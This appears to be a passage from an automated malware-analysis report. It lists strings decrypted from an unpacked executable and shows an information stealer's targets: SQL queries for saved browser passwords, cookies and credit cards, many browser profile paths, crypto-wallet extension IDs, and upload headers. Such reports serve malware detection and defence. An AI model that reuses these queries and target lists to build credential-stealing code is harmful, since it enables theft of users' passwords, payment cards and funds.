                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetDIBits
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: SaveDC
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CreateDIBSection
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: DeleteDC
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: RestoreDC
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: DsRoleGetPrimaryDomainInformation
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetModuleFileNameExA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CryptUnprotectData
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: BCryptCloseAlgorithmProvider
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: BCryptDestroyKey
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: BCryptOpenAlgorithmProvider
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: BCryptSetProperty
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: BCryptGenerateSymmetricKey
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: BCryptDecrypt
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: VaultOpenVault
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: VaultCloseVault
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: VaultEnumerateItems
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: VaultGetItemWin8
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: VaultGetItemWin7
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: VaultFree
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: StrCmpCA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: StrStrA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: PathMatchSpecA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: SHGetFolderPathA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: ShellExecuteExA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GdipGetImageEncodersSize
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GdipGetImageEncoders
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GdiplusStartup
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GdiplusShutdown
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GdipSaveImageToStream
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GdipDisposeImage
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GdipFree
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CreateStreamOnHGlobal
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetHGlobalFromStream
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: SymMatchString
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: HEAD
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: HTTP/1.1
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: POST
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: file
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Content-Disposition: form-data; name="
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Content-Disposition: form-data; name="file"; filename="
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Content-Type: application/octet-stream
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Content-Transfer-Encoding: binary
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: SOFT:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: PROF: ?
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: PROF:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: HOST:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: USER:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: PASS:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: sqlite3_open
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: sqlite3_prepare_v2
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: sqlite3_step
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: sqlite3_column_text
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: sqlite3_finalize
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: sqlite3_close
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: sqlite3_column_bytes
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: sqlite3_column_blob
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: encrypted_key
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: PATH
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: PATH=
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: NSS_Init
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: NSS_Shutdown
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: PK11_GetInternalKeySlot
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: PK11_FreeSlot
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: PK11_Authenticate
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: PK11SDR_Decrypt
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Cookies\%s_%s.txt
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: TRUE
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: FALSE
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Autofill\%s_%s.txt
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: SELECT name, value FROM autofill
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CC\%s_%s.txt
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Card number:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Name on card:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Expiration date:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: History\%s_%s.txt
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: SELECT url FROM urls
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Downloads\%s_%s.txt
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: SELECT target_path, tab_url from downloads
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Login Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Cookies
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Web Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: History
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: logins.json
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: formSubmitURL
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: usernameField
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: encryptedUsername
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: encryptedPassword
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: guid
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: SELECT url FROM moz_places
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: cookies.sqlite
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: formhistory.sqlite
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: places.sqlite
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Local State
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: ..\profiles.ini
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: C:\ProgramData\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Chrome
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Google\Chrome\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: ChromeBeta
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Google\Chrome Beta\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: ChromeCanary
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Google\Chrome SxS\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Chromium
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Chromium\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Edge_Chromium
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Microsoft\Edge\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Kometa
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Kometa\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Amigo
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Amigo\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Torch
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Torch\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Orbitum
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Orbitum\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Comodo
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Comodo\Dragon\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Nichrome
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Nichrome\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Maxthon5
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Maxthon5\Users
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Sputnik
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Sputnik\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Epic Privacy Browser\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Vivaldi
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Vivaldi\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CocCoc
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \CocCoc\Browser\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Uran
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \uCozMedia\Uran\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \QIP Surf\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Cent
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \CentBrowser\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Elements
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Elements Browser\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: TorBro
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \TorBro\Profile
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CryptoTab
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \CryptoTab Browser\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Brave
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \BraveSoftware\Brave-Browser\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Opera
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Opera Software\Opera Stable\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: OperaGX
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Opera Software\Opera GX Stable\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: OperaNeon
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Opera Software\Opera Neon\User Data
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Firefox
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Mozilla\Firefox\Profiles\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: SlimBrowser
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \FlashPeak\SlimBrowser\Profiles\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: PaleMoon
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Moonchild Productions\Pale Moon\Profiles\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Waterfox
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Waterfox\Profiles\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Cyberfox
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \8pecxstudios\Cyberfox\Profiles\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: BlackHawk
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \NETGATE Technologies\BlackHawk\Profiles\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: IceCat
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Mozilla\icecat\Profiles\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: KMeleon
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \K-Meleon\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Thunderbird
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Thunderbird\Profiles\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: passwords.txt
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: ibnejdfjmmkpcnlpebklmnkoeoihofec
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: TronLink
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: nkbihfbeogaeaoehlefnkodbefgpgknn
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: MetaMask
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: fhbohimaelbohpjbbldcngcnapndodjp
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Binance Chain Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: ffnbelfdoeiohenkjibnmadjiehjhajb
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Yoroi
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: jbdaocneiiinmjbjlgalhcelgbejmnid
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Nifty Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: afbcbjpbpfadlkmhmclhkeeodmamcflc
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Math Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: hnfanknocfeofbddgcijnmhnfnkdnaad
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Coinbase Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: hpglfhgfnhbgpjdenjgmdgoeiappafln
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Guarda
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: blnieiiffboillknjnepogjhkgnoapac
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: EQUAL Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: cjelfplplebdjjenllpjcblmjkfcffne
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Jaxx Liberty
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: fihkakfobkmkjojpchpfgcmhfjnmnfpi
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: BitApp Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: kncchdigobghenbbaddojjnnaogfppfj
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: iWallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: amkmjjmmflddogmhpjloimipbofnfjih
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Wombat
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: nlbmnnijcnlegkjjpcfjclmcfggfefdm
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: MEW CX
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: nanjmdknhkinifnkgdcggcfnhdaammmj
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GuildWallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: nkddgncdjgjfcddamfgcmfnlhccnimig
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Saturn Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: fnjhmkhhmkbjkkabndcnnogagogbneec
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Ronin Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: cphhlgmgameodnhkjdmkpanlelnlohao
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: NeoLine
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: nhnkbkgjikgcigadomkphalanndcapjk
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Clover Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: kpfopkelmapcoipemfendmdcghnegimn
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Liquality Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: aiifbnbfobpmeekipheeijimdpnlpgpp
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Terra Station
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: dmkamcknogkgcdfhhbddcghachkejeap
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Keplr
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: fhmfendgdocmcbmfikdcogofphimnkno
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Sollet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: cnmamaachppnkjgnildpdmkaakejnhae
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Auro Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: jojhfeoedkpkglbfimdfabpdfjaoolaf
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Polymesh Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: flpiciilemghbmfalicajoolhkkenfel
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: ICONex
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: nknhiehlklippafakaeklbeglecifhad
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Nabox Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: hcflpincpppdclinealmandijcmnkbgn
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: ookjlbkiijinhpmnjffcofjonbfbgaoc
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Temple
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: mnfifefkajgofkcjkemidiaecocnkjeh
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: TezBox
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: dkdedlpgdmmkkfjabffeganieamfklkm
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Cyano Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: nlgbhdfgdhgbiamfdfmbikcdghidoadd
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Byone
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: infeboajgfhgbjpjbeppbkgnabfdkdaf
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: OneKey
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: cihmoadaighcejopammfbmddcmdekcje
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: LeafWallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: lodccjjbdhfakaekdiahmedfbieldgik
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: DAppPlay
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: ijmpgkjfkbfhoebgogflfebnmejmfbml
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: BitClip
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: lkcjlnjfpbikmcmbachjpdbijejflpcm
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Steem Keychain
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: onofpnbbkehpmmoabgpcpmigafmmnjhl
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Nash Extension
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: bcopgchhojmggmffilplmbdicgaihlkp
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Hycon Lite Client
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: klnaejjgbibmhlephnhpmaofohgkpgkd
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: ZilPay
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: aeachknmefphepccionboohckonoeemg
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Coin98 Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: bfnaelmomeimhlpmgjnjophhpkkoljpa
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Phantom
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: hifafgmccdpekplomjjkcfgodnhcellj
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Crypto.com
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: dngmlblcodfobpdpecaadgfbcggfjfnm
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Maiar DeFi Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: ppdadbejkmjnefldpcdjhnkpbjkikoip
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Oasis
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: hpbgcgmiemanfelegbndmhieiigkackl
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: MonstaWallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: fcckkdbjnoikooededlapcalpionmalo
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: MOBOX
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: jccapkebeeiajkkdemacblkjhhhboiek
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Crust Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: mgffkfbidihjpoaomajlbgchddlicgpn
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Pali Wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: nphplpgoakhhjchkkhmiggakijnkhfnd
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: TON Wallet
